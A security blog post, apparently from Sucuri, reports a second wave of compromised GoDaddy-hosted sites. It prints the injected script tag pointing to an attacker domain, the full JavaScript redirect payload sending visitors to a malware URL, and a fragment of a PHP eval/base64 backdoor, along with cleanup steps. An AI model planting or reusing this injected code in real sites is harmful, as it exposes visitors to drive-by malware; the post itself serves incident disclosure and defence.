Second round of GoDaddy sites hacked

It seems that a second round of attacks are happening today at GoDaddy and infecting all kind of sites (Joomla, Wordress,etc). Looking at the modification dates on the files, they all happened May 1st (today) during the morning from 1 to 3/4 am.

All of them had the following javascript added to their pages:

script src= http://kdjkfjskdfjlskdjf.com/kp.php

Which looks very similar to the attacks from the last few weeks, but this time using kp.php instead of js.php. Also, many sites that were not infected during the previous batch got hacked now.

This is how this kb.php file looks like:

function setCookie(c_name,value,expiredays)
{
var exdate=new Date(); exdate.setDate(exdate.getDate()+expiredays);
document.cookie=c_name+ “=” +escape(value)+ ((expiredays==null) ? “” :
“;expires=”+exdate.toGMTString()); } function getCookie(c_name){
if (document.cookie.length>0)
{
c_start=document.cookie.indexOf(c_name + “=”);
if (c_start!=-1) { c_start=c_start + c_name.length+1;
c_end=document.cookie.indexOf(“;”,c_start);
if (c_end==-1) c_end=document.cookie.length; return
unescape(document.cookie.substring(c_start,c_end)); } } return “”; } var
name=getCookie(“pma_visited_theme1″); if (name==””){ setCookie(“pma_visited_theme1″,”1″,20);
var
url=”http://www3.workfree36-td.xorg.pl/?p=p52dcWpkbG6Hnc3KbmNToKV1iqHWnG3KXsWYlGhnZWuVmA%3D%3D”; window.top.location.replace(url);
}else{ }

As you can see, very similar to the previous attack, also loading malware from this *.xorg.pl domain…

If your site got hacked, open your index files and look for this string on the top of it:

< ?php /**/ eval(base64_decode(“aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYha
XNzZXQoJEdMT0JBTFNbJ2..

Removing that from all your index files should solve the problem.

If you are using WordPress, all the *.php files inside your themes folder got modified. So, you have to clean them too.

UPDATE 1 – People are starting to complain on the WordPress forums: http://wordpress.org/support/topic/394255.

UPDATE 2tweeted about it saying that it is related only to WordPress. It is affecting all platforms there.

As always, if you need help to recover from a malware/hacking attack or need someone to monitor your web site for these issues, visit http://sucuri.net or just send us an email at contact@sucuri.net.